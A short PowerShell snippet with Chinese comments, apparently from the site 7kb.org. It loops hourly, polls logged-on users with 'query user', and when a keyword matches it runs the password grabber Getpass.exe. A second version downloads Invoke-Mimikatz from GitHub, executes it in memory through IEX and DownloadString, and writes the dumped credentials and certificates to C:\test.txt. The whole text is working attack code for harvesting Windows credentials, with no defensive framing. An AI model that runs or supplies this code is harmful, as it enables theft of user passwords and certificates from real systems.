while($true){
//执行的命令
$a=query user
#从返回结果里检查关键字
if([string]$a -like "*关键字*")
{
#执行程序
Getpass.exe >>C:\test.txt
}

#时间单位毫秒
sleep -mill 3600000
}

while($true){
//执行的命令
$a=query user
#从返回结果里检查关键字
if([string]$a -like "*关键字*")
{
#下载执行Mimikatz
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz –DumpCerts >>C:\test.txt } 
#时间单位毫秒 
sleep -mill 3600000 
}

 

 

 

 

 

 

 

 

 

 

 

7kb.org 原创,如有转载请注明出处 www.7kb.org